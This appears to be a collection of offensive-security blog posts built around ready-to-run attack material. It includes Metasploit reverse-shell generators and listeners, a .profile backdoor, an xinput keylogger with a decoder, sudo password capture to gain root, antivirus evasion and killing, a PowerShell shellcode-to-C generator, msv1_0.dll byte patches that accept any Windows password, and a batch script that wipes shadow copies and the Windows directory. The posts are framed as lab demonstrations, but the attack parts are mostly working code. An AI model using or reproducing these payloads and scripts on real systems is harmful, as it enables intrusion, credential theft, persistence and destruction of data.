Actually I think that Comodo’s sandbox approach is very good. You take any unknown binaries and automatically distrust them and place them into sandbox. Thus if we for example bypass its Antivirus Heuristics and manage to get a shell on the target we wont be able to do much on the system level as the whole expolit process will be separated by the sandbox.

It took a while to defeat the sandbox and for a time Comodo was on my top list of AV products. This method can bypass the Defense+ in paranoid mode and the Antivirus heuristics. Metasploit reverse payload is slightly customized of course in order to get by the AV.  I cannot disclose the details of the Sandbox escape in order to protect the innocent and from the abuse by script-kiddies.  Below is a demonstration on how the attack if performed featuring Viktor Cleaner giving a final strike.

In case you wonder what strange language the Windows 7 is in its Czech.

A little video update on the Comodo sandbox bypass. More Abracadabra added for special effects, starring Matt A. Sploit and comrade Viktor.

* One picture is worth more than ten thousand words.
– Chinese proverb

Here is something very old, but still very cool. Attached are txt files that when saved as com (16bit MS DOS binary executables) will run. Pure magic. It works in DOS, Win9x, Win2k and WinXP SP3. In Windows 7 (32bit) you can only run console apps as the ntvdm.exe wont allow the app to take over VGA.

I have encoded a few text files which can be run in a lab environment (Remember these are unknown ASCII executables after all ! ) Plus I am including the original com2txt ASCII binary and exe2com ASCII binary for further encoding experiments.

So here is how the com2txt looks like : 

Download here and rename to com2txt.com : com2txt.doc

In case you need to convert a 16bit EXE into a COM then you can use the this : exe2com

These programs were not created by me but by some Japanese guy a long time ago. Anyways there is a source code to the converter which can be found online.  I am including some example ASCII executables here to play with (Old games)

blocks  mario pingu passw

Remember to save these files with COM extensions.

Also Kaspersky Antivirus 2013 was released a few days back, so I’ve tested it here :

“I need a jug of wine and a book of poetry,
Half a loaf for a bite to eat,
Then you and I, seated in a deserted spot,
Will have more wealth than a Sultan’s realm.”

Recently I was able to look at the 64bit version of Windows 7 and check the MsvpPasswordValidate within the ms1_0.dll to see if it is possible to NOP the TRUE/FALSE RtlCompareMemory function when we compare hashes in memory.

It is actually much simpler then the Win7 SP1 32bit version of the library, with so much less objects in IDA-view it was very easy to find the function and replace it with NOP.

So in my demonstration Im using IDA-pro (for 64bit DLLs) and a patch utility called ida_patcher.c (download it from IDA and compile using Visual Studio Express 2010) to diff the results against the msv1_0.dll

So we search for the function MsvpPasswordValidate within the msv1_0.dll and check the following section in the IDA-view

Looks simple right ? So next we need to highlight the jnz loc_7FF735183A4
and switch to hex view so that we can see the part which we can patch like so:

Next we patch the highlited hex strings with NOP so instead of  0F 85 7C 80 00 00 we will have 90 90 90 90 90 90

Then we produce a DIFF file with our changes which we can then patch using the ida_patcher.exe

So the final command would be > ida_patcher.exe -i msv1_0.dll -p msv1_0.dll.patch

The resulting msv1_0.dll  (which we have copied from the C:\windows\system32 to another location right ?) can be used to authenticate with any password against Win7 64 SP1. For the tests sake I’ve just replaced the original msv1_0.dll with the patched one and i can login with any password imaginable. Nothing groundbreaking, but still could be used as a nice magic trick to amuse kids in your local IT class.

I’ve always wondered what this logo reminds me of…wait it was an old Greek state flag  from 1822 – 1969 The colors were used in the Greek revolution when they fought the Ottoman Empire.

OK, now we move next to the latest OS from Microsoft -> Windows 8 Pro 64bit. There seems to be a big void in the description of various functions inside the library, so it makes debugging harder, but not impossible. I had to go manually trough all the functions to check for our RtlCompareMemory friends and find the correct section which needs to be patched. There seems to be incomplete info on the Microsoft Symbol Server for the PDB of msv1_0.dll (or at least this is how I understand this)

So after a careful analysis I came up with the following anonymous function that should correspond to MsvpPasswordValidate :

It is :   sub_18001014C

Next we look for the RtlCompareMemory function and patch our jnz loc with NOP, in this case it is starting with loc_1800101F0 and jnz_loc 18001B4B7

So we open it in HEX view and do our modifications of the jnz_loc 18001B4B7

Produce a diff and patch the file, reboot to linux, copy over the C:\windows\system32\msv1_0.dll and reboot, any password should work to login into the system.

msv1_0.dll
0000F609: 0F 90
0000F60A: 85 90
0000F60B: A8 90
0000F60C: B2 90
0000F60D: 00 90
0000F60E: 00 90

Here is the patch for the file. Use ida_patcher.exe to patch the original msv1_0.dll and test in your lab.

Oh boy,

I just love numbers and all sorts of combinations. It creates a never-ending space of possibilities and meanings. Take anything and you can always relate to numbers in one way or the other. Like the numbers 32 and 64.

Year 32 (AD)

Year 64 (AD)

Now back to computers, 8bit, 16bit, 32bit, 64bit…….I’ve slightly modified Viktor Cleaner to work in Windows 64bit environment, as the previous release was not able to unload 64bit Antivirus. Now it can. You can find the file attached, it is encrypted again and guess what the password is.

viktor64.tar.bz2

Here is a video demonstration of Windows 7 SP1 64bit with Dr.Web antivirus  being unloaded and bypassed.

Also here is an example of Windows 8 64bit with BitDefender 2013 being bypassed and unloaded.

Also I’ve included a little video demonstration from msv1_0.dll patching session against Windows Server 2012. This trick wont work if the server will take role as a domain controller, but any other role should be OK.  Just a note for computers that are joined to a domain – in order to unlock any account the system must not be able to authenticate against a reachable domain, so the local cache credentials are used and we can trick that via the patched msv1_0.dll. It would be fun to see if it would be possible to patch kerberos.dll for example to allow a so called “Happy Hour” on a domain.

As always, test these things in your lab environment and virtual machines, its like playing a computer game after all.

P.S.

People forget, lets go back and bring back some truly random thoughts

These people came from different nationalities, religions and classes for fighting for what is right knows not of race, color or creed.

This was a particularly fun exercise and I decided to share the details as well as the scripts that I’ve created and modified from various sources. First of all, there are very few articles describing Metasploit meterpreter used against Linux (Ubuntu in this case) so I decided to fill in the gap and make this walk-trough from the point where the target runs our binary payload to a complete root compromise of the target system.  So this is what I have used in my scenario:

• Ubuntu 12.04 LTS 32bit default installation with all updates running inside a VM
• VirtualBox
• Metasploit framework – current
• Debian Squeeze 64bit as my host platform

So first of all I have prepared a simple little binary elf generator in bash to make things easier. Place this file in the Metasploit root folder :

#!/bin/bash
clear
echo "************************************************"
echo "  LINUX ELF BINARY GENERATOR FOR METASPLOIT    *"
echo "************************************************"
echo -e "What IP are we gonna use  ex. 192.168.0.1?  \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
./msfpayload linux/x86/meterpreter/reverse_tcp LHOST=$IP LPORT=$port R| ./msfencode -t elf -e x86/shikata_ga_nai >> Executive
echo "Executive binary generated.."
chmod u=rwx Executive
ls -la Executive

OK now we have an ELF binary called Executive which we will use on the target Ubuntu system.

Next we need to start up a listener for our reverse meterpreter shell, again place this file in the root folder of Metasploit.

#!/bin/bash
clear
echo "*********************************************"
echo "   METASPLOIT LINUX METERPRETER LISTENER    *" 
echo "*********************************************"
echo "Here is a network device list available on yor machine" 
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
OS=`uname` 
IO="" # store IP
case $OS in
   Linux) IP=`/sbin/ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
echo "      starting the meterpreter listener.."
./msfcli exploit/multi/handler  PAYLOAD=linux/x86/meterpreter/reverse_tcp  LHOST=$IP LPORT=$port  E

So once we have the listener interface up and running we can move onto the target Ubuntu system.

I got some feedback regarding how did the executable get to the target in the first place. Well  I copied it there myself, being myself as the potential victim. This is not a real world scenario, but rather a simulation of what is possible. I do not wish to get into details on how to push the binary to the user. It is not in the scope of this exercise. But bear in mind that there are a few ways to do it.

Pictures say more than words, so here is a screenshot of the whole process >

So now we are ready to execute the “Unknown” binary on the target computer. When I double click the Executive binary nothing happens, but we get a reverse shell on our listener interface.

So what now ? We have a shell, but we want Root right ? The next few steps get more interesting as we go deeper into the problem.We will plant a backdoor into the home folder of the current user and execute it via the .profile script when the user logs in. So we first download the .profile from the home directory

We modify the .profile locally to include the backdoor by adding a launcher to the Executive binary like so  ./.executive & (make sure it is executable)

And finally we upload the modified .profile to the target like so

Next we upload the ELF binary executable to the home folder and  rename it it .executive and make sure it is RWX

So now we have a permanent backdoor planted, and every time the target logs in he executes silently the elf binary called .executive in his .profile.

So now what, we have a user shell and we want more, we want root right ? So lets get root.

Ubuntu ships with xinput so we can abuse this as a keylogger and record every keystroke the user inputs while in his X session. I have developed a special set of scripts usable with Metasploit to make the whole process fast and easy.  So now we need to upload a keylog.sh script to the target and execute it.

Here is the source for the keylog.sh

#!/bin/bash
export DISPLAY=:0.0
xinput list
echo -e "KBD ID ?"
read kbd 
xmodmap -pke > /tmp/.xkey.log
script -c "xinput test $kbd" | cat >> /tmp/.xkey.log & 
echo "The keylog can be downloaded from /tmp/.xkey.log" 
echo "Use the meterpreter download function" 
echo "Press CTLR+C to exit this session, keylogger will run in backround"

This script is pretty self explanatory, we set the DISPLAY, get the xinput ID for the keyboard, dump the xmodmap to /tmp/.xkey.log  and append any keystrokes to the same /tmp/.xkey.log file. We need to download the /tmp/.xkey.log file after a while to see if there are any captured keystrokes and decode it.

So we upload it and run it

We put in the KBD ID in this case it is id=10

And terminate the shell session as the keylogger is running in the background. After a while when we think that the log file with keystrokes is full we download the .xkey.log from the /tmp folder like so

Next we need to decode the content of the .xkey.log so it would be readable. I have created a special decoder script that can do just that. Again the .xkey.log needs to be in the path of the decoder script

#!/bin/sh 
cat .xkey.log | grep keycode > xmodmap.pke
cat .xkey.log | grep 'key p' > xlog 
rm -f .xkey.log 
#Generating some Python to do the decoding
echo 'import re, collections, sys' > decoder.py 
echo 'from subprocess import *' >> decoder.py
echo 'def keyMap():' >> decoder.py
echo '   table = open("xmodmap.pke")' >> decoder.py
echo '   key = []' >> decoder.py
echo '   for line in table:' >> decoder.py
echo "      m = re.match('keycode +(\d+) = (.+)', line.decode())" >> decoder.py
echo '      if m and m.groups()[1]:' >> decoder.py
echo '         key.append(m.groups()[1].split()[0]+"_____"+m.groups()[0])' >> decoder.py
echo '   return key' >> decoder.py
echo 'def printV(letter):' >> decoder.py
echo '      key=keyMap();' >> decoder.py
echo '      for i in key:' >> decoder.py
echo '              if str(letter) == i.split("_____")[1]:' >> decoder.py
echo '                     return i.split("_____")[0]' >> decoder.py
echo '      return letter' >> decoder.py
echo 'if len(sys.argv) < 2:' >> decoder.py
echo '        print "Usage: %s FILE" % sys.argv[0];' >> decoder.py
echo '        exit();' >> decoder.py
echo 'else:' >> decoder.py
echo '        f = open(sys.argv[1])' >> decoder.py
echo '        lines = f.readlines()' >> decoder.py
echo '        f.close()' >> decoder.py
echo '        for line in lines:' >> decoder.py
echo "                m = re.match('key press +(\d+)', line)" >> decoder.py
echo '                if m:' >> decoder.py
echo '                          keycode = m.groups()[0]' >> decoder.py
echo '                          print (printV(keycode))' >> decoder.py

echo 'Please see LOG-keylogger for the output......' 
python decoder.py xlog > LOG
sed ':a;N;$!ba;s/\n/ /g' LOG > LOG-keylogger 
rm -f LOG 
rm -f xmodmap.pke 
rm -f decoder.py
rm -f xlog 
cat LOG-keylogger

So when we run this script (python is needed) we can see something like this:

So if the user does elevate via sudo then we get the password in this log. So how do we do sudo su in the meterpreter shell ? Normally we cannot as you can see here in the screenshot

There is a trick however that can bypass the no TTY problem  and that is Python. Python is shipped by default on Ubuntu 12.04 LTS so we can type this:

python -c ‘import pty;pty.spawn(“/bin/bash”)’   and we can elevate to root via sudo su

And that is the end.  We now have root and own the box. I hope you have enjoyed reading this as much as I have creating it. CentOS, Debian Squeeze for example do not ship  the xinput binary by default, so this attack is not possible.

A quick and dirty solution is just # chmod a-x /path/to/xinput to prevent keyboard sniffing.

UPDATE > even if the xinput binary is not present on the system, we can upload a generic one to the target and execute it via the meterpreter shell.  I have tested the Ubuntu 12.04 LTS 32bit xinput against Debian Squeeze 64bit and it works and we can sniff the keyboard.

Here is a video presentation of the above attack

“While we teach, we learn”   Seneca

OK, the next interesting exercise was with OSX. I dont have a powerful machine to run the latest Mountain Lion, but rather I have used the Snow Leopard 10.6.2  These findings are not new, main idea was taken from Darkoperators blog, but I will show some modifications and alternatives that I have came up with.

Most importantly I am doing the demo on OSX running Kaspersky Antivirus for Mac. At this point Kaspersky flags some payloads, some not. So it was fun bypassing and unloading it from memory. By the way, much easier on OSX then on Windows.

So firstly we have a OSX 32bit reverse shell  generator to create a source code for our executable:

clear
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                  By Astr0baby 2011                         "
echo "        TESTING FOR OSX 32bit tested on 10.6                "
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
echo -e "What IP are we gonna use ?  \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
./msfpayload   osx/x86/shell_reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/call4_dword_xor  > test.c
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp.c
cat ready.c >> temp.c
echo ";" >> temp.c
echo "int main(void) { ((void (*)())micro)();" >> temp.c
echo "}" >> temp.c
mv temp.c final.c
echo "final.c is ready in ShellCode, please compile it usig gcc on OSX"
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4

This will generate a c source file called final.c which we will compile using GCC on OSX (I am not aware of any cross-compiler enviroment to compile macho binaries in linux)

Next we need to generate and obfuscate a Java meterpreter JAR file. Java is present on OSX so it is a perfect method of deploying the meterpreter to the target. So Here is the script that generates it:

clear  
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                  By Astr0baby 2011                         "
echo "        TESTING FOR OSX 32bit tested on 10.6                "  
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
echo -e "What IP are we gonna use ?  \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
./msfpayload   java/meterpreter/reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R  > test.jar  
mv test.jar ShellCode
echo "test.jar generated in ShellCode folder..."

Now the resulting test.jar will get flagged by Kaspersky AV, so we need to change it a little. For this I chose to use ProGuard 4.8 ProGuard I will show you here what I did to get by the AV heuristics with the jar file.

Next screenshots show the settings I have used to get past KAV on OSX.

So now that we have the obfuscated JAR file we can copy it over to the OSX because we need to pack it along with the first macho reverse shell payload.

The next step is to create a PKG for OSX that will include both files generated previously. I have used an Open Source Iceberg to create the PKG . Next screenshots show the process.

What is important is to include the script install.sh in a project path in Iceberg. The install.sh script looks like this:

#!/bin/sh
/Applications/Utilities/OSXBin &

So when we execute the PKG this script calls the OSXBin binary which we have compiled first using GCC on OSX. Also we have included the JAR file for execution once we get the reverse shell.

Now we need to setup 2 listeners on our attacking machine, I use these scripts:

#!/bin/bash
clear
echo "***************************************************************"
echo "       Automatic  shellcode generator - FOR METASPLOIT         "
echo "       For Automatic Teensy programming and deployment         "
echo "***************************************************************"
echo "Here is a network device list available on yor machine" 
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
OS=`uname` 
IO="" # store IP
case $OS in
   Linux) IP=`/sbin/ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
echo "      starting the meterpreter listener.."
./msfcli exploit/multi/handler  PAYLOAD=osx/x86/shell_reverse_tcp   LHOST=$IP LPORT=$port  E

And the JAVA listener:

#!/bin/bash
clear
echo "***************************************************************"
echo "       Automatic  shellcode generator - FOR METASPLOIT         "
echo "       For Automatic Teensy programming and deployment         "
echo "***************************************************************"
echo "Here is a network device list available on yor machine"
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
OS=`uname`
IO="" # store IP
case $OS in
   Linux) IP=`/sbin/ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
echo "      starting the meterpreter listener.."
./msfcli exploit/multi/handler  PAYLOAD=java/meterpreter/reverse_tcp   LHOST=$IP LPORT=$port  E

We need to specify different ports of course for the listening interfaces, I use 8080 and 8081.

So when the target OSX installs the PKG and gets prompted for a password we get a reverse root shell from which we can execute the JAVA meterpreter JAR file which would be dumped into /Applications/Utilities/obfuscated.jar

we execute it like so

#java -jar /Applications/Utilities/obfuscated.jar

And we get a meterpreter shell opening in a new window running with root privileges ! Next we kill the Antivirus by going into the AV directory where the main kav binary resides and renaming it to something else like old.kav

cd /Library/"Application Support"/"Kaspersky Lab"/KAV/Binaries
mv kav old.kav

Next we just kill -9 the kav PIDs and that is all. The above step is necessary otherwise kav process will respawn immediately after being killed.

I have made a video of the whole process to see here:

This post is password protected. You must visit the website and enter the password to continue reading.

A prism can be used to break light up into its constituent spectral colors (the colors of the rainbow). Prisms can also be used to reflect light, or to split light into components with different polarizations. Or they can be used for something completely different …

I just love the Fabulous Furry Freak Brothers comix. I believe this picture is from the mid 80s. Nothing has changed much I guess, people just don’t remember. And don’t forget boys and girls that…

And here is the last thought on the subject …

For todays exercise I have created a scenario where the target Windows system needs to be nuked after a successful compromise so that it cannot boot back to windows. Being a Linux user I have always liked a possibility to nuke the mounted root partition by a simple single command like “rm -rf / “. After all it is my system and I can zap it whenever I want to. In windows it is a little harder and I am sure there are tons of howtos available on the Internet. I needed something stealthy which would run via meterpreter shell in the background of the target windows box. So obviously nuking the users files is not a good idea. We just want to make sure that upon next reboot the machine will barf up a “Black screen of Death”.

So we  have “bypassed” all the pesky AVs and have a nice admin shell

Next we upload the following batch to the target system, lets call it nuke.bat

 @echo off
echo Taking ownership....
takeown /f c:\* >nul 2>nul
takeown /f %windir%\* >nul 2>nul
takeown /f %windir%\system32 >nul 2>nul
takeown /f %windir%\system32\* >nul 2>nul
takeown /f %windir%\system32\drivers >nul 2>nul
takeown /f %windir%\system32\drivers\*  >nul 2>nul
takeown /f c:\recovery >nul 2>nul
takeown /f c:\recovery\* >nul 2>nul
takeown /f c:\perflogs >nul 2>nul
takeown /f c:\perflogs\* >nul 2>nul
takeown /f "c:\system volume information\" >nul 2>nul
takeown /f "c:\system volume information\*" >nul 2>nul

icacls c:\* /grant administrators:f /t >nul 2>nul
icacls %windir% /grant administrators:f /t >nul 2>nul
icacls %windir%\* /grant administrators:f /t >nul 2>nul
icacls %windir%\system32 /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\* /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\drivers /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\drivers\* /grant administrators:f /t >nul 2>nul
icacls c:\recovery /grant administrators:f /t >nul 2>nul
icacls c:\recovery\* /grant administrators:f /t >nul 2>nul
icacls c:\perflogs /grant administrators:f /t >nul 2>nul
icacls c:\perflogs\* /grant administrators:f /t >nul 2>nul
icacls "c:\system volume information\" /grant administrators:f /t >nul 2>nul
icacls "c:\system volume information\*" /grant administrators:f /t >nul 2>nul

echo Nuking system files...
vssadmin delete shadows /All /Quiet >nul 2>nul 
vssadmin delete shadows /All /Quiet >nul 2>nul 
rmdir c:\PrefLogs /s /q >nul 2>nul 
rmdir c:\Recovery /s /q >nul 2>nul
rmdir "C:\System Volume Information" /s /q >nul 2>nul
rmdir c:\Windows /s /q >nul 2>nul

echo Done

You need admin privileges for this to work and remember that it will nuke the System !

This operation takes some time maybe around 2 minutes, the HDD will be working really hard to process all those files, but in Windows all looks fine and the system seems to be running fine…

But when we reboot…

Windows cannot fix itself from the recovery console and it wont be able to restore any snapshots as we have deleted them from the batch command. The user files are left intact, there is no need nuke those.

I still prefer the rm -rf / from my linux box though, windows version is much more cumbersome, but maybe there is some magic one-liner in powershell perhaps ?

There is an excellent python script out made available by David Kennedy called the Unicorn; a simple python script that does PowerShell downgrade attack and inject shellcode straight into memory. The project page is here:

https://github.com/trustedsec/unicorn

Direct download is here:

https://github.com/trustedsec/unicorn/raw/master/unicorn.py

The usage is pretty simple, download the python script, save it to your metasploit root directory and execute it, the resulting ASCII output can be fed directly to the target PowerShell.

I have created a little generator that generates a compilable C code out of this so you can compile a nice Win32 PE executable which will get you by most modern AVs (Tested against Kaspersky, MS Essentials, ESET ..) it will only work on Windows 7,8 32/64 bits. I have tried it on XP with PowerShell installed but could not get it to run.

So here is the source for the Unicorn2c generator:

#!/bin/bash
clear
echo '--------------------------------------'
echo ' Unicorn Powershell2C code generator  '
echo 'Works for Vista, Win7, Win8 32/64 bit'
echo '--------------------------------------'
if [ -z "$*" ];then  
echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform' 
echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo 'Valid platforms are: nonuac uac' 
exit 0 
fi
case $4 in 
nonuac)
echo 'Generating nonUAC unicorn.c ...' 
python unicorn.py $1 $2 $3  
echo '#include <stdio.h>' > unicorn.c 
echo '#include <string.h>' >> unicorn.c
echo '#include <stdlib.h>' >> unicorn.c
echo '#include <ctype.h>' >> unicorn.c 
echo '#include <aclapi.h>' >> unicorn.c 
echo '#include <shlobj.h>' >> unicorn.c 
echo '#include <windows.h>' >> unicorn.c 
echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c  
echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c 
echo 'int main(int argc, char *argv[])' >> unicorn.c
echo '{' >> unicorn.c 
echo 'FreeConsole();' >> unicorn.c  
echo -n ' ShellExecute( NULL,NULL, "powershell.exe", "' >> unicorn.c
cat powershell_attack.txt | sed -r 's/^.{11}//' >> unicorn.c
echo -n '",NULL,NULL);' >> unicorn.c
echo '' >> unicorn.c 
echo 'exit(0);' >> unicorn.c
echo '}' >> unicorn.c 
todos unicorn.c 
echo '[*] Exported unicorn.c To compile use cl.exe unicorn.c'
;;

uac)
echo 'Generating UAC  unicorn.c ...'
python unicorn.py $1 $2 $3
echo '#include <stdio.h>' > unicorn.c
echo '#include <string.h>' >> unicorn.c
echo '#include <stdlib.h>' >> unicorn.c
echo '#include <ctype.h>' >> unicorn.c
echo '#include <windows.h>' >> unicorn.c
echo '#include <aclapi.h>' >> unicorn.c
echo '#include <shlobj.h>' >> unicorn.c
echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c
echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c
echo 'int main(int argc, char *argv[])' >> unicorn.c
echo '{' >> unicorn.c
echo 'FreeConsole();' >> unicorn.c
echo -n ' ShellExecute( NULL, "runas", "powershell.exe", "' >> unicorn.c
cat powershell_attack.txt | sed -r 's/^.{11}//' >> unicorn.c
echo -n '",NULL,NULL);' >> unicorn.c
echo '' >> unicorn.c
echo 'exit(0);' >> unicorn.c
echo '}' >> unicorn.c
todos unicorn.c
echo '[*] Exported unicorn.c To compile use cl.exe unicorn.' 
;;

"")
echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform'
echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo 'Valid platforms are: nonuac, uac' 
exit 0 
;;
esac

Save this as an executable shell script in your metasploit root directory and make sure you have the original unicorn.py in the path. Usage is simple, run the shell script with required options. There is a fourth variable there and that being nonuac and uac. The resulting C code is different in the shellexecute function option “runas” (for UAC) and NULL (for nonUAC).

If for example the UAC compiled binary is executed from an elevated command prompt then the shellexecute function loads powershell with same privileges enabling us to GETSYSTEM and migrate to any process. But if a non privileged user runs the UAC binary he gets prompted for credentials, thus there is an option to generate the C code as non-UAC, but from which we wont be able to GETSYSTEM or migrate to other processes then ours.

Compilation is easy, either Visual Studio C++ 2010,2012 express or full, using the Visual Studio Tools command prompt compile for 32bit ! like so:

cl.exe unicorn.c

Sometimes the binary takes a while to spawn a reverse shell on the listener, but this is maybe due to the fact that my system is virtual and I have low memory resources.

Recently Microsoft has issued a Consumer Preview  for public download of Windows 8.1. I have gone through the msv1_0.dll file to look for the msvppasswordvalidate function in the dll and patch the corresponding section with a bypass code. There are slight changes from previous release of course which is described below. Still searching for a reliable way to do this via Metasploit meterpreter screen_unlock.rb script for 64bit platform (no problem for 32bit) But like in the previous example, a local patch of msv1_0.dll is required for this demo.

Mysterious function that we are interested in is SUB_18000588C – msvppasswordvalidate

Again a quick view in HEX the equivalent of  JNZ  LOC_1800432C0  is

0F 85 EB 26 02 00

Patching this value by 90 90 90 90 90 90 we successfully bypass any local authentication via msv1_0.dll in Windows 8.1 (any password you type will do etc…)

Here is the patch diff:

msv1_0.dll
0001FFCF: 0F 90
0001FFD0: 85 90
0001FFD1: EB 90
0001FFD2: 26 90
0001FFD3: 02 90
0001FFD4: 00 90

Patch the original dll using ida_patcher.exe and replace the msv1_0.dll in C:\Windows\System32\msv1_0.dll with the patched dll. I have used a Linux live CD with ntfs-3g drivers to do this for the demo.

Recently I ran into a need to run a good native Antivirus software on one of my linux boxes (Debian amd64). There are many available options, but I have always liked F-Secure and its products for some reason. F-Secure offers a Knoppix based RescueCD downloadable from here: download.f-secure.com/estore/rescue-cd-3.16-52606.iso which contains all the linux binaries to run local scans against winpe and elf binaries.

To extract the goodies from the CD first boot it with VirtualBox, 

Once booted, you need to switch to second console via Alt+F2Next we will create a tarball with all the needed files from the LiveCD

Command is following:

tar -cvf fsecure.tar /etc/opt/f-secure/ /var/opt/f-secure/ /opt/f-secure/ /etc/init.d/fsaua /etc/init.d/fsupdate

Once we have the tarball, we scp it to our host like so: 

TT is a temporary subfolder created for this purpose in user home directory, 10.0.2.2 is an IP address of the host running VirtualBox.

scp fsecure.tar user@10.0.2.2:~/TT

Now we can switch off the Virtual machine, we don’t need it anymore.  Now we can install extract the fsecure.tar from root directory in our host:

# mv /home/user/TT/fsecure.tar /
# cd /
# tar -xvf fsecure.tar

The tarball creates the following directories and fills them with f-secure files:

.:
total 12
drwxr-xr-x 4 user user 4096 Jul 24 19:25 etc
drwxr-xr-x 3 user user 4096 Jul 24 19:25 opt
drwxr-xr-x 3 user user 4096 Jul 24 19:25 var

./etc:
total 8
drwxr-xr-x 2 user user 4096 Jul 24 19:25 init.d
drwxr-xr-x 3 user user 4096 Jul 24 19:25 opt

./etc/init.d:
total 12
-rwxr-xr-x 1 user user 2635 Jun 26 2012 fsaua
-rwxr-xr-x 1 user user 4127 Jun 26 2012 fsupdate

./etc/opt:
total 4
drwxr-xr-x 6 user user 4096 Jun 26 2012 f-secure

./etc/opt/f-secure:
total 16
drwxr-xr-x 2 user user 4096 Jun 26 2012 fsaua
drwxr-xr-x 3 user user 4096 Jun 26 2012 fsma
drwxr-xr-x 2 user user 4096 Jun 26 2012 fssp
drwxr-xr-x 2 user user 4096 Jun 26 2012 product_versions

./etc/opt/f-secure/fsaua:
total 4
-rw-r--r-- 1 user user 3434 Jun 26 2012 fsaua_config

./etc/opt/f-secure/fsma:
total 4
drwxr-xr-x 2 user user 4096 Jun 26 2012 policy

./etc/opt/f-secure/fsma/policy:
total 116
-rw-r--r-- 1 user user 10151 Jun 26 2012 fsav_linux_sp.dpf
-rw-r--r-- 1 user user 5179 Jun 26 2012 fsav_linux_sp.msg
-rw-r--r-- 1 user user 97623 Jun 26 2012 fsav_linux_sp.txt

./etc/opt/f-secure/fssp:
total 20
-rw-r--r-- 1 user user 13001 Jun 26 2012 fssp.conf
-rw-r--r-- 1 user user 11 Jun 26 2012 fssp_updateseries

./etc/opt/f-secure/product_versions:
total 4
-rw-r--r-- 1 user user 52 Jun 26 2012 1.3.6.1.4.1.2213.48

./opt:
total 4
drwxr-xr-x 5 user user 4096 Jun 26 2012 f-secure

./opt/f-secure:
total 116
drwxr-xr-x 2 user user 4096 Jun 26 2012 doc
-rw-r--r-- 1 user user 32386 Jun 26 2012 eula_0806.txt
drwxr-xr-x 5 user user 4096 Jun 26 2012 fsaua
-rwxr-xr-x 1 user user 31735 Jun 26 2012 fsscan_partitions.sh
drwxr-xr-x 10 user user 4096 Jun 26 2012 fssp
-rw-r--r-- 1 user user 2370 Jun 26 2012 linuxteam.gpg
-rwxr-xr-x 1 user user 4175 Jun 26 2012 repair_script.sh
-rwxr-xr-x 1 user user 9120 Jun 26 2012 terminal_cmap
-rw-r--r-- 1 user user 6586 Jun 26 2012 terminal_cmap.c
-rwxr-xr-x 1 user user 6558 Jun 26 2012 transmogrify_cd_into_stick.sh

./opt/f-secure/doc:
total 4
-rw-r--r-- 1 user user 1652 Jun 26 2012 manual.html

./opt/f-secure/fsaua:
total 40
drwxr-xr-x 2 user user 4096 Jun 26 2012 bin
drwxr-xr-x 2 user user 4096 Jun 21 2012 etc
-rw-r--r-- 1 user user 3433 Jun 21 2012 fsaua_config.template
-rw-r--r-- 1 user user 23312 Jun 21 2012 fsbw.dpf
drwxr-xr-x 2 user user 4096 Jun 26 2012 libexec

./opt/f-secure/fsaua/bin:
total 804
-rwxr-xr-x 1 user user 429524 Jun 21 2012 fsaua
-rwxr-xr-x 1 user user 19396 Jun 21 2012 fsaua-config
-rwxr-x--- 1 user user 9236 Jun 21 2012 fsaua-ctrl
-rwxr-xr-x 1 user user 81248 Jun 21 2012 fsauaprogress
-rwxr-xr-x 1 user user 188824 Jun 21 2012 fsauasc
-rwxr-xr-x 1 user user 84320 Jun 21 2012 fsauatool

./opt/f-secure/fsaua/etc:
total 0

./opt/f-secure/fsaua/libexec:
total 20
-rw-r--r-- 1 user user 6986 Jun 21 2012 fsaua-functions
-rwxr-xr-x 1 user user 2635 Jun 21 2012 fsaua_startup-debian-ubuntu
-rw-r--r-- 1 user user 468 Jun 21 2012 fsaua_startup-gentoo
-rwxr-xr-x 1 user user 2441 Jun 21 2012 fsaua_startup-redhat-suse

./opt/f-secure/fssp:
total 36
drwxr-xr-x 2 user user 4096 Jun 26 2012 bin
drwxr-xr-x 2 user user 4096 Jun 26 2012 databases
